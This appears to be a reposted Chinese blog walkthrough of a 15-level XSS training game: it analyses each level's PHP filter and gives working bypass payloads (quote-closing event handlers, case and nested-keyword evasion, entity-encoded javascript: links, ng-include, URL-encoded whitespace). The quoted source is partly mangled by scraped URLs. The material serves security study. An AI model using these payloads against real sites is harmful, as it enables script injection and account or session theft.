主頁 >  其他 > xss小游戲原始碼分析

xss小游戲原始碼分析

2020-09-18 11:41:04 其他

配置

下載地址:https://files.cnblogs.com/files/Lmg66/xssgame-master.zip
使用:下載解壓,放到www目錄下(phpstudy),http服務下都行,我使用的是phpstudy

第一關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦!");
window.location.href=https://www.cnblogs.com/Lmg66/p/"level2.php?keyword=跨站師"; 
}
</script>
第1關

<body>

第1關 先熱個身吧

<?php ini_set("display_errors", 0); $str = $_GET["name"]; echo "

歡迎用戶:".$str."

"; ?>
<?php echo "

payload的長度:".strlen($str)."

"; ?>

分析:

對name沒有任何的過濾輸出到標簽中,基本的xss都行

payload:

level1.php?name=<script>alert('xss')</script>

第二關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦!");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"level3.php?writing=苦盡甘來"; 
}
</script>
第2關

<body>

第2關 窒息的操作

<?php ini_set("display_errors", 0); $str = $_GET["keyword"]; echo "

沒有找到和".htmlspecialchars($str)."相關的結果.

".'<center> <form action=level2.php method=GET> <input name=keyword value=https://www.cnblogs.com/Lmg66/p/"'.$str.'"> <input type=submit name=submit value=https://www.cnblogs.com/Lmg66/p/"搜索"/> '; ?> <center><img src=https://www.cnblogs.com/Lmg66/p/"https://dn-coding-net-tweet.codehub.cn/photo/2019/688da926-8a0b-452a-9a2b-82ba919328fb.jpg"> <?php echo "

payload的長度:".strlen($str)."

"; ?>

分析:

用htmlspecialchars()函式,之前做過,會html物體化,<>會被轉義
可以嘗試"來閉合"

payload:

" onclick=alert('XSS') //
" onclick=alert('XSS') "

第三關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦!");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"level4.php?keyword=寧靜致遠"; 
}
</script>
第3關

<body>

第3關 這該咋辦啊

<?php ini_set("display_errors", 0); $str = $_GET["keyword"]; echo "

沒有找到和".htmlspecialchars($str)."相關的結果.

"."
"; ?>
<?php echo "

payload的長度:".strlen($str)."

"; ?>

分析:

和第二關類似,只是變成了單引號,閉合單引號即可

payload:

' onclick=alert('xss') '
' onclick=alert('xs') //

第四關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦!");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"level5.php?keyword=逆水行舟"; 
}
</script>
第4關

<body>

第4關 生無可戀

<?php ini_set("display_errors", 0); $str = $_GET["keyword"]; $str2=str_replace(">","",$str); $str3=str_replace("<","",$str2); echo "

沒有找到和".htmlspecialchars($str)."相關的結果.

".'<center> <form action=level4.php method=GET> <input name=keyword value=https://www.cnblogs.com/Lmg66/p/"'.$str3.'"> <input type=submit name=submit value=https://www.cnblogs.com/Lmg66/p/搜索 /> '; ?> <center><img src=https://www.cnblogs.com/Lmg66/p/"https://dn-coding-net-tweet.codehub.cn/photo/2019/0d3f0d24-a861-4d20-97da-f807ea842be8.jpg"> <?php echo "

payload的長度:".strlen($str3)."

"; ?>

分析:

在第二關的基礎上進行了< >的過濾,但第二關payload沒有 < >仍然可以使用

payload:

" onclick=alert('XSS') //
" onclick=alert('XSS') "

第五關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦!");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"level6.php?keyword=柳暗花明"; 
}
</script>
第5關

<body>

第5關 沒錯又是搜索

<?php ini_set("display_errors", 0); $str = strtolower($_GET["keyword"]); $str2=str_replace("<script","沒有找到和".htmlspecialchars($str)."相關的結果.".'<center> <form action=level5.php method=GET> <input name=keyword value=https://www.cnblogs.com/Lmg66/p/"'.$str3.'"> <input type=submit name=submit value=https://www.cnblogs.com/Lmg66/p/搜索 /> '; ?> <center><img src=https://www.cnblogs.com/Lmg66/p/"https://dn-coding-net-tweet.codehub.cn/photo/2019/cb30e912-eabc-4357-89eb-49e8de1b1961.jpg"> <?php echo "

payload的長度:".strlen($str3)."

"; ?>

分析:

strtolower()函式,把字符轉換為小寫,接著替換script標簽和on使這個兩個事件沒法使用,但仍可以閉合引號,所以要使用其他標簽通過javascript:alert('xss')來觸發彈出

payload:

"><a href=javascript:alert('xss') "
"><a href=javascript:alert('xss') //

第六關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦!");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"level7.php?keyword=持之以恒"; 
}
</script>
第6關

<body>

第6關 嗯 還是搜索

<?php ini_set("display_errors", 0); $str = $_GET["keyword"]; $str2=str_replace("<script","沒有找到和".htmlspecialchars($str)."相關的結果.".'<center> <form action=level6.php method=GET> <input name=keyword value=https://www.cnblogs.com/Lmg66/p/"'.$str6.'"> <input type=submit name=submit value=https://www.cnblogs.com/Lmg66/p/搜索 /> '; ?> <center><img src=https://www.cnblogs.com/Lmg66/p/"https://dn-coding-net-tweet.codehub.cn/photo/2019/92847238-8dda-473f-9c04-83986de1472a.jpg"> <?php echo "

payload的長度:".strlen($str6)."

"; ?>

分析:

替換了script標簽,on,src,data,herf,且html物體化看起來似乎沒問題,但相比前幾關發現沒有轉換為小寫,所以可大小寫來繞過匹配

payload:

" ONclick=alert('XSS') //
"><a Href=javascript:alert('XSS') //

第7關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦!");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"level8.php?keyword=笨鳥先飛"; 
}
</script>
第7關

<body>

第7關 猜一猜下面題目還有搜索嘛

<?php ini_set("display_errors", 0); $str =strtolower( $_GET["keyword"]); $str2=str_replace("script","",$str); $str3=str_replace("on","",$str2); $str4=str_replace("src","",$str3); $str5=str_replace("data","",$str4); $str6=str_replace("href","",$str5); echo "

沒有找到和".htmlspecialchars($str)."相關的結果.

".'<center> <form action=level7.php method=GET> <input name=keyword value=https://www.cnblogs.com/Lmg66/p/"'.$str6.'"> <input type=submit name=submit value=https://www.cnblogs.com/Lmg66/p/搜索 /> '; ?> <center><img src=https://www.cnblogs.com/Lmg66/p/"https://dn-coding-net-tweet.codehub.cn/photo/2019/17532328-f4cc-4bca-b283-c7f7b5a13f80.jpg" width="20%"> <?php echo "

payload的長度:".strlen($str6)."

"; ?>

分析:

get方式傳入keyword,strtolowe()函式變為小寫,然后replace()函式匹配script,on,src,data,href,但是只是匹配了一次,所以可以嵌套繞過,最后htmlspecialchars(),所以< > 不能用,嘗試閉合"

payload:

" oonnclick=alert('XSS') //

第八關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦!");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"level9.php?keyword=水滴石穿"; 
}
</script>
第8關

<body>

第8關 老鐵要和我換友鏈嘛?

<?php ini_set("display_errors", 0); $str = strtolower($_GET["keyword"]); $str2=str_replace("script","scr_ipt",$str); $str3=str_replace("on","o_n",$str2); $str4=str_replace("src","sr_c",$str3); $str5=str_replace("data","da_ta",$str4); $str6=str_replace("href","hr_ef",$str5); $str7=str_replace('"','&quot',$str6); echo '<center> <form action=level8.php method=GET> <input name=keyword value=https://www.cnblogs.com/Lmg66/p/"'.htmlspecialchars($str).'"> <input type=submit name=submit value=https://www.cnblogs.com/Lmg66/p/添加友情鏈接 /> '; ?> <?php echo '<center><BR><a href=https://www.cnblogs.com/Lmg66/p/"'.$str7.'">友情鏈接</a></center>'; ?> <center><img src=https://www.cnblogs.com/Lmg66/p/"https://dn-coding-net-tweet.codehub.cn/photo/2019/d2d2080f-746c-4276-9f63-585fc4fd4a9c.jpg" width="20%"> <?php echo "

payload的長度:".strlen($str7)."

"; ?>

分析:

get方式傳入keyword,strtolower()轉換為小寫,然后replace替換script,on,src,data,href,"("號html物體化了),然后發現又html物體化輸入,似乎沒有問題,然后發現友情鏈接,沒有html物體化輸入,可以嘗試在這個位置繞過,但是都被過濾了,嘗試編碼繞過對JavaScript;alert('xss')編碼(呸,不是編碼)轉義https://www.jianshu.com/p/6dcefb2a59b2(參考鏈接),目的是繞過replace,然后仍能被html決議

payload:

javascrip&#x74:alert('xss')
javascrip&#x09t:alert('XSS')

第九關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦!");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"level10.php?keyword=持之以恒"; 
}
</script>
第9關

<body>

第9關 添加友連again

<?php ini_set("display_errors", 0); $str = strtolower($_GET["keyword"]); $str2=str_replace("script","scr_ipt",$str); $str3=str_replace("on","o_n",$str2); $str4=str_replace("src","sr_c",$str3); $str5=str_replace("data","da_ta",$str4); $str6=str_replace("href","hr_ef",$str5); $str7=str_replace('"','&quot',$str6); echo '<center> <form action=level9.php method=GET> <input name=keyword value=https://www.cnblogs.com/Lmg66/p/"'.htmlspecialchars($str).'"> <input type=submit name=submit value=https://www.cnblogs.com/Lmg66/p/添加友情鏈接 /> '; ?> <?php if(false===strpos($str7,'http://')) { echo '<center><BR><a href=https://www.cnblogs.com/Lmg66/p/"您的鏈接不合法?有沒有!">友情鏈接'; } else { echo '<center><BR><a href=https://www.cnblogs.com/Lmg66/p/"'.$str7.'">友情鏈接</a></center>'; } ?> <center><img src=https://www.cnblogs.com/Lmg66/p/"https://dn-coding-net-tweet.codehub.cn/photo/2019/51fb4236-2965-42ab-851e-0ec266b3c3ba.jpg"> <?php echo "

payload的長度:".strlen($str7)."

"; ?>

分析:

和第八關相同,只是判斷鏈接是否合法,加上http://就可以了

payload:

javascrip&#x74:alert('xss') //http://

第十關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦!");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"level11.php?keyword=自強不息"; 
}
</script>
第10關

<body>

第10關 嗯 搜索又出現了

<?php ini_set("display_errors", 0); $str = $_GET["keyword"]; $str11 = $_GET["t_sort"]; $str22=str_replace(">","",$str11); $str33=str_replace("<","",$str22); echo "

沒有找到和".htmlspecialchars($str)."相關的結果.

".'<center> <form id=search> <input name="t_link" value=https://www.cnblogs.com/Lmg66/p/"'.'" type="hidden"> <input name="t_history" value=https://www.cnblogs.com/Lmg66/p/"'.'" type="hidden"> <input name="t_sort" value=https://www.cnblogs.com/Lmg66/p/"'.$str33.'" type="hidden"> </form> </center>'; ?> <center><img src=https://www.cnblogs.com/Lmg66/p/"https://dn-coding-net-tweet.codehub.cn/photo/2019/fed9cb1c-3111-49a8-b111-16081ac4b16c.jpg"> <?php echo "

payload的長度:".strlen($str)."

"; ?>

分析:

傳入keyword和t_sort,keyword沒有過濾,但是html物體化輸出,而且沒在標簽內,所以應該沒問題,看t_sort,過濾了< > ,而且沒有物體化輸出
嘗試閉合引號

payload:

?keyword=123&t_sort=" type="text" onclick=alert('XSS') //

第十一關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦!");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"level12.php?keyword=破釜沉舟"; 
}
</script>
第11關

<body>

第11關 為什么這么多搜索呢

<?php ini_set("display_errors", 0); $str = $_GET["keyword"]; $str00 = $_GET["t_sort"]; $str11=$_SERVER['HTTP_REFERER']; $str22=str_replace(">","",$str11); $str33=str_replace("<","",$str22); echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結果.</h2>".'<center> <form id=search> <input name="t_link" value=https://www.cnblogs.com/Lmg66/p/"'.'" type="hidden"> <input name="t_history" value=https://www.cnblogs.com/Lmg66/p/"'.'" type="hidden"> <input name="t_sort" value=https://www.cnblogs.com/Lmg66/p/"'.htmlspecialchars($str00).'" type="hidden"> <input name="t_ref" value=https://www.cnblogs.com/Lmg66/p/"'.$str33.'" type="hidden"> </form> </center>'; ?> <center><img src=https://www.cnblogs.com/Lmg66/p/"https://dn-coding-net-tweet.codehub.cn/photo/2019/60a6e17f-c823-40c3-ab84-502b2f905456.jpg"> <?php echo "

payload的長度:".strlen($str)."

"; ?>

分析:

str和str00都html物體化而且不在script標簽內部,且閉合為',應該無解,然后發現str33,沒有物體化,$_SERVER['HTTP_REFERER']獲取httpreferer資訊,只是過濾了< > ,可以閉合雙引號來繞過,不過我沒明白這題啥用

payload:

" type = "text" onclick=alert('xss')//

第十二關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦!");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"level13.php?keyword=矢志不渝"; 
}
</script>
第12關

<body>

第12關 黑人問號

<?php ini_set("display_errors", 0); $str = $_GET["keyword"]; $str00 = $_GET["t_sort"]; $str11=$_SERVER['HTTP_USER_AGENT']; $str22=str_replace(">","",$str11); $str33=str_replace("<","",$str22); echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結果.</h2>".'<center> <form id=search> <input name="t_link" value=https://www.cnblogs.com/Lmg66/p/"'.'" type="hidden"> <input name="t_history" value=https://www.cnblogs.com/Lmg66/p/"'.'" type="hidden"> <input name="t_sort" value=https://www.cnblogs.com/Lmg66/p/"'.htmlspecialchars($str00).'" type="hidden"> <input name="t_ua" value=https://www.cnblogs.com/Lmg66/p/"'.$str33.'" type="hidden"> </form> </center>'; ?> <center><img src=https://www.cnblogs.com/Lmg66/p/"https://dn-coding-net-tweet.codehub.cn/photo/2019/f4558b8c-778b-4dd8-bef6-425766f9d178.jpg"> <?php echo "

payload的長度:".strlen($str)."

"; ?>

分析:

和上一關一樣,xss位置變一下

payload:

" type = "text" onclick=alert('xss')//

第十三關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦!");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"level14.php"; 
}
</script>
第13關

<body>

第13關 做題好爽啊

<?php setcookie("user", "call me maybe?", time()+3600); ini_set("display_errors", 0); $str = $_GET["keyword"]; $str00 = $_GET["t_sort"]; $str11=$_COOKIE["user"]; $str22=str_replace(">","",$str11); $str33=str_replace("<","",$str22); echo "

沒有找到和".htmlspecialchars($str)."相關的結果.

".'<center> <form id=search> <input name="t_link" value=https://www.cnblogs.com/Lmg66/p/"'.'" type="hidden"> <input name="t_history" value=https://www.cnblogs.com/Lmg66/p/"'.'" type="hidden"> <input name="t_sort" value=https://www.cnblogs.com/Lmg66/p/"'.htmlspecialchars($str00).'" type="hidden"> <input name="t_cook" value=https://www.cnblogs.com/Lmg66/p/"'.$str33.'" type="hidden"> </form> </center>'; ?> <center><img src=https://www.cnblogs.com/Lmg66/p/"https://dn-coding-net-tweet.codehub.cn/photo/2019/c048c2e3-7937-478b-9781-0ee4d7214648.jpg"> <?php echo "

payload的長度:".strlen($str)."

"; ?>

分析:

$_COOKIE["user"];獲取cookie,然后過濾< > 沒有物體化輸入,嘗試閉合雙引號

payload:

user=" type = "text" onclick=alert('xss')//

第十四關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script src=https://www.cnblogs.com/Lmg66/p/"https://chao.jsanhuan.cn/angular.min.js"></script>
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦!");
 window.location.href="level15.php?keyword=業精于勤"; 
}
</script>
第14關

第14關 恭喜你快要通關了

<?php ini_set("display_errors", 0); $str = $_GET["src"]; echo'<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>'; ?>

分析:

傳入src,然后物體化輸出,然后似乎無解,仔細看前面ng-include:,
ng-include 指令用于包含外部的 HTML 檔案,包含的內容將作為指定元素的子節點,ng-include 屬性的值可以是一個運算式,回傳一個檔案名,默認情況下,包含的檔案需要包含在同一個域名下,所以傳入其他關的xss,不過不知道這有啥用既然其他地點有xss

payload:

src='https://www.cnblogs.com/Lmg66/p/level1.php?name='

由于參考的js代碼失敗,所以我沒成功,但云靶機是對的,云靶機地址:https://www.xss.tv/

第十五關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("ORZ ORZ ORZ 恭喜全部通過");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"success.txt"; 
}
</script>
第15關

<body>

第15關 厲害了 Word哥

<?php ini_set("display_errors", 0); $str = strtolower($_GET["keyword"]); $str2=str_replace("script"," ",$str); $str3=str_replace(" "," ",$str2); $str4=str_replace("/"," ",$str3); $str5=str_replace(" "," ",$str4); echo "
".$str5."
"; ?>
<?php echo "

payload的長度:".strlen($str5)."

"; ?>

分析:

get傳入可以word,轉換為小寫,讓過濾script,空格,/,可以使用url編碼來繞過

符號 url編碼
回車 %0d
換行 %0d

payload:

level15.php?keyword=<img%0asrc=https://www.cnblogs.com/Lmg66/p/x%0aonerror=alert('XSS')>

參考文章

國光大佬:https://www.sqlsec.com/2020/01/xss.html
最后歡迎訪問我的博客:https://lmg66.github.io/

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/73466.html

標籤:其他

上一篇:一個unity工程不知道從哪里打開

下一篇:通過安全廠商的設備發現企業存在的安全問題

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • 2023年最新微信小程式抓包教程

    01 開門見山 隔一個月發一篇文章,不過分。 首先回顧一下《微信系結手機號資料庫被脫庫事件》,我也是第一時間得知了這個訊息,然后跟蹤了整件事情的經過。下面是這起事件的相關截圖以及近日流出的一萬條資料樣本: 個人認為這件事也沒什么,還不如關注一下之前45億快遞資料查詢渠道疑似在近日復活的訊息。 訊息是 ......

    uj5u.com 2023-04-20 08:48:24 more
  • web3 產品介紹:metamask 錢包 使用最多的瀏覽器插件錢包

    Metamask錢包是一種基于區塊鏈技術的數字貨幣錢包,它允許用戶在安全、便捷的環境下管理自己的加密資產。Metamask錢包是以太坊生態系統中最流行的錢包之一,它具有易于使用、安全性高和功能強大等優點。 本文將詳細介紹Metamask錢包的功能和使用方法。 一、 Metamask錢包的功能 數字資 ......

    uj5u.com 2023-04-20 08:47:46 more
  • vulnhub_Earth

    前言 靶機地址->>>vulnhub_Earth 攻擊機ip:192.168.20.121 靶機ip:192.168.20.122 參考文章 https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html https://www.cnb ......

    uj5u.com 2023-04-20 07:46:20 more
  • 從4k到42k,軟體測驗工程師的漲薪史,給我看哭了

    清明節一過,盲猜大家已經無心上班,在數著日子準備過五一,但一想到銀行卡里的余額……瞬間心情就不美麗了。最近,2023年高校畢業生就業調查顯示,本科畢業月平均起薪為5825元。調查一出,便有很多同學表示自己又被平均了。看著這一資料,不免讓人想到前不久中國青年報的一項調查:近六成大學生認為畢業10年內會 ......

    uj5u.com 2023-04-20 07:44:00 more
  • 最新版本 Stable Diffusion 開源 AI 繪畫工具之中文自動提詞篇

    🎈 標簽生成器 由于輸入正向提示詞 prompt 和反向提示詞 negative prompt 都是使用英文,所以對學習母語的我們非常不友好 使用網址:https://tinygeeker.github.io/p/ai-prompt-generator 這個網址是為了讓大家在使用 AI 繪畫的時候 ......

    uj5u.com 2023-04-20 07:43:36 more
  • 漫談前端自動化測驗演進之路及測驗工具分析

    隨著前端技術的不斷發展和應用程式的日益復雜,前端自動化測驗也在不斷演進。隨著 Web 應用程式變得越來越復雜,自動化測驗的需求也越來越高。如今,自動化測驗已經成為 Web 應用程式開發程序中不可或缺的一部分,它們可以幫助開發人員更快地發現和修復錯誤,提高應用程式的性能和可靠性。 ......

    uj5u.com 2023-04-20 07:43:16 more
  • CANN開發實踐:4個DVPP記憶體問題的典型案例解讀

    摘要:由于DVPP媒體資料處理功能對存放輸入、輸出資料的記憶體有更高的要求(例如,記憶體首地址128位元組對齊),因此需呼叫專用的記憶體申請介面,那么本期就分享幾個關于DVPP記憶體問題的典型案例,并給出原因分析及解決方法。 本文分享自華為云社區《FAQ_DVPP記憶體問題案例》,作者:昇騰CANN。 DVPP ......

    uj5u.com 2023-04-20 07:43:03 more
  • msf學習

    msf學習 以kali自帶的msf為例 一、msf核心模塊與功能 msf模塊都放在/usr/share/metasploit-framework/modules目錄下 1、auxiliary 輔助模塊,輔助滲透(埠掃描、登錄密碼爆破、漏洞驗證等) 2、encoders 編碼器模塊,主要包含各種編碼 ......

    uj5u.com 2023-04-20 07:42:59 more
  • Halcon軟體安裝與界面簡介

    1. 下載Halcon17版本到到本地 2. 雙擊安裝包后 3. 步驟如下 1.2 Halcon軟體安裝 界面分為四大塊 1. Halcon的五個助手 1) 影像采集助手:與相機連接,設定相機引數,采集影像 2) 標定助手:九點標定或是其它的標定,生成標定檔案及內參外參,可以將像素單位轉換為長度單位 ......

    uj5u.com 2023-04-20 07:42:17 more
  • 在MacOS下使用Unity3D開發游戲

    第一次發博客,先發一下我的游戲開發環境吧。 去年2月份買了一臺MacBookPro2021 M1pro(以下簡稱mbp),這一年來一直在用mbp開發游戲。我大致分享一下我的開發工具以及使用體驗。 1、Unity 官網鏈接: https://unity.cn/releases 我一般使用的Apple ......

    uj5u.com 2023-04-20 07:40:19 more